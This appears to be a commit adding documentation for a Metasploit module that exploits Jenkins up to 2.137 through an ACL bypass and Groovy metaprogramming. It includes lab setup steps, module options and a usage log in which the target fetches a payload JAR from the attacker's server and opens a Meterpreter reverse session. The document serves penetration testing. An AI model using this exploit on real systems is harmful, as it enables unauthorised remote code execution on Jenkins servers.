Add module doc
parent
621fa8e4db
commit
b2c21c754f
|
@ -0,0 +1,76 @@
|
|||
## Intro
|
||||
|
||||
This module exploits a vulnerability in Jenkins dynamic routing to
|
||||
bypass the `Overall/Read` ACL and leverage Groovy metaprogramming to
|
||||
download and execute a malicious JAR file.
|
||||
|
||||
The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
|
||||
on later versions of Jenkins.
|
||||
|
||||
Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
|
||||
|
||||
## Setup
|
||||
|
||||
1. `git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc`
|
||||
2. `cd cve-2019-1003000-jenkins-rce-poc/sample-vuln`
|
||||
3. Edit `run.sh` and change `2.152-alpine` to `2.137`
|
||||
4. `./run.sh`
|
||||
|
||||
## Targets
|
||||
|
||||
```
|
||||
Id Name
|
||||
-- ----
|
||||
0 Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**RPORT**
|
||||
|
||||
Set this to the Jenkins port. The default is 8080.
|
||||
|
||||
**TARGETURI**
|
||||
|
||||
Set this to the Jenkins base path. The default is `/`.
|
||||
|
||||
**SRVPORT**
|
||||
|
||||
Set this to the port on which to serve the payload. Change it from 8080
|
||||
to something like 8081 if you are testing Jenkins locally on port 8080.
|
||||
|
||||
**ForceExploit**
|
||||
|
||||
Set this to `true` to override the `check` result during exploitation.
|
||||
|
||||
## Usage
|
||||
|
||||
```
|
||||
msf5 exploit(multi/http/jenkins_metaprogramming) > run
|
||||
|
||||
[*] Started HTTPS reverse handler on https://192.168.1.2:8443
|
||||
[*] Jenkins 2.137 detected
|
||||
[+] Jenkins 2.137 is a supported target
|
||||
[+] ACL bypass successful
|
||||
[*] Using URL: http://0.0.0.0:8081/
|
||||
[*] Local IP: http://192.168.1.2:8081/
|
||||
[*] Sending Jenkins and Groovy go-go-gadgets
|
||||
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
|
||||
[-] Sending 404
|
||||
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
|
||||
[+] Sending 200
|
||||
[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
|
||||
[+] Sending payload JAR
|
||||
[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
|
||||
[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
|
||||
[*] Server stopped.
|
||||
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: jenkins
|
||||
meterpreter > sysinfo
|
||||
Computer : 6f21b8da2915
|
||||
OS : Linux 4.9.93-linuxkit-aufs (amd64)
|
||||
Meterpreter : java/linux
|
||||
meterpreter >
|
||||
```
|
Loading…
Reference in New Issue